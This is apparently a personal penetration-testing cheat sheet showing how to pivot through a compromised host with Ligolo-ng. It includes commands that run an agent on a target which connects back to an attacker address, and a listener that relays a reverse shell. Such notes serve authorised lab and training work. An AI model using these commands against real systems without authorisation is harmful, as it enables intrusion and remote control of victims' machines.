#####################################################################
  _   _               _             _      ____           _        
 | \ | | _____      _| |_ ___  _ __| | __ |  _ \ __ _ ___| |_ __ _ 
 |  \| |/ _ \ \ /\ / / __/ _ \| '__| |/ / | |_) / _` / __| __/ _` |
 | |\  |  __/\ V  V /| || (_) | |  |   <  |  __/ (_| \__ \ || (_| |
 |_| \_|\___| \_/\_/  \__\___/|_|  |_|\_\ |_|   \__,_|___/\__\__,_|


#####################################################################




{{{ # Redirection 

# Ligolo-ng
https://github.com/nicocha30/ligolo-ng

# start the proxy and create a tun interface
./proxy -selfcert
interface_create
iflist

# upload the appropriate agent to the target and connect back to kali
./agent -connect 10.10.14.213:11601 -ignore-cert

# Enter the new session and add a route and start the tunnel
sessions
route_add --name <INTERFACE_NAME> --route <NETWORK>
route_list 
tunnel_start --tun <INTERFACE_NAME>

# reverse shell
# Creates a listener on the machine where we're running the agent at port 1234
# and redirects the traffic to port 4444 on our machine.
# You can use other ports, of course.

listener_add --addr 0.0.0.0:1234 --to 0.0.0.0:4444

# view listeners
listener_list


}}}





